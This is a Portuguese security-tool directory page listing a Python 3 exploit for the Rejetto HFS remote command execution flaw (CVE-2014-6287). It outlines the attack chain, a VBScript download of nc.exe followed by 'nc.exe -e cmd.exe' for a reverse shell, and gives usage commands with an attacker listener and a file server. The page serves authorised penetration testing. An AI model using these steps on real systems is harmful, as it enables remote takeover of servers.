Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
rejjeto_hfs-rce-exploit-cve-2014-6287 — Exploit de execução remota de comandos para o Rejetto HTTP File Server 2.3.x (CVE-2014-6287) reescrito em Python 3 para testes modernos de segurança ofensiva. | Kitploit
Ferramentas/GitHubGitHub/joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHub
joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287

rejjeto_hfs-rce-exploit-cve-2014-6287

Exploit de execução remota de comandos para o Rejetto HTTP File Server 2.3.x (CVE-2014-6287) reescrito em Python 3 para testes modernos de segurança ofensiva.

Ver Repositório
3há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit de Execução Remota de Comandos no HFS (CVE-2014-6287)

Esta é uma reescrita em Python 3 do clássico exploit de Execução Remota de Comandos (RCE) que visa o Rejetto HTTP File Server (HFS) v2.3.x, explorando a vulnerabilidade identificada como CVE-2014-6287.

Originalmente descoberto por Avinash Kumar Thapa, também conhecido como "-Acid", esta versão melhora a portabilidade e a usabilidade, fornecendo parametrização completa e compatibilidade moderna.


⚠️ Aviso Legal

Esta ferramenta é fornecida exclusivamente para fins educacionais e de teste de penetração autorizado. O uso não autorizado contra sistemas que você não possui ou para os quais não possui permissão explícita para testar é ilegal e antiético.


📌 Detalhes do Exploit

  • Vulnerabilidade: Rejetto HFS v2.3.x - Execução Remota de Comandos
  • CVE: CVE-2014-6287
  • Impacto: Execução remota de código com privilégios de sistema
  • Requisito: O alvo deve estar executando uma versão vulnerável do HFS com scripts habilitados.

🚀 Recursos

  • Totalmente compatível com Python 3
  • Aceita todos os parâmetros principais via CLI:
  • IP e porta do alvo
  • IP local (atacante)
  • Porta de escuta para o reverse shell
  • Porta usada para hospedar o nc.exe
  • Sem valores hardcoded
  • Entrega clássica de reverse shell com nc.exe usando VBScript
  • Fluxo do exploit:
    1. Enviar um VBScript para baixar o nc.exe
    2. Executar o VBScript no alvo
    3. Executar nc.exe -e cmd.exe para estabelecer o reverse shell

  • 🛠️ Uso

    root@kitploit:~
    python3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>
    
    Example:
    python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000
    
    Requirements:
      - HTTP server serving nc.exe:
          python3 -m http.server 8000
      - Listener:
          nc -lvnp 4444
    
    Baixar ferramenta